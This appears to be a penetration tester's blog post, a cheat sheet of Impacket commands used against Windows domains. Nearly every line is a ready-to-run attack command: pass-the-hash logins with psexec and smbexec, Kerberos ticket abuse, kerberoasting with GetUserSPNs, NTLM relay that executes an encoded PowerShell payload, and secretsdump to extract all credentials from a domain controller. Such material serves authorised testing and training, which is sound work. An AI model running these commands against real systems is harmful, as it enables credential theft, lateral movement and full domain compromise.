Practical Impacket

This blog post documents practical uses of Impacket’s scripts that we have used in engagements, exams and during research.

Impacket (https://github.com/SecureAuthCorp/impacket) is a brilliant collection of Python scripts developed by SecureAuth used to work with network protocols and Windows. The scripts are incredibly versatile and make a pentester’s life much easier. It would be safe to say that we are fans of the tool.

Below are some examples of using Impacket’s scripts in various ways. For this post, we use Impacket as packaged in Kali Linux; the syntax might be different if you have cloned the repository manually.

Log in to a domain-joined Windows computer with an NTLM hash

impacket-psexec -no-pass -hashes :e48c13cefd8f9456d79cd49651c134e8 domain/user@10.10.10.10

Get a Kerberos ticket for a user with an NTLM hash

impacket-getTGT -hashes :2ae7b18071bd6a1e405e6b51390918e4 domain/user -dc-ip 10.10.10.2

Log in to a domain computer with a Kerberos ticket

impacket-psexec -no-pass -k domain/user -dc-ip 10.10.10.2 -target-ip 10.10.10.5

Connect to an SMB share using a Kerberos ticket

impacket-smbclient "user@domain" -k -no-pass -target-ip 10.10.10.5 -dc-ip 10.10.10.2

Log in to a domain computer with SMB creds to get SYSTEM (where psexec is disallowed)

impacket-smbexec Domain/User:Password@targetip

Get Active Directory users from a domain controller with Kerberos ticket authentication

impacket-GetADUsers -all -k -no-pass -dc-ip 10.10.10.2 domain.com/user

Get kerberoastable domain accounts from a domain controller with credentials

impacket-GetUserSPNs -request -dc-ip 10.10.10.2 domain/user -outputfile hashes.kerberoast

Connect to an MS SQL database server with credentials

impacket-mssqlclient user:password@10.10.10.6 -port 1433 -windows-auth

Relay Net-NTLM hashes from Responder to targets and run PowerShell

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.8 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqA...ARQBYAA=='

Convert a ccache Kerberos ticket to kirbi format

impacket-ticketConverter krb5cc_1394201122_MerMmG jking.kirbi

Extract all secrets from a domain controller

impacket-secretsdump domain/user:password@10.10.10.2
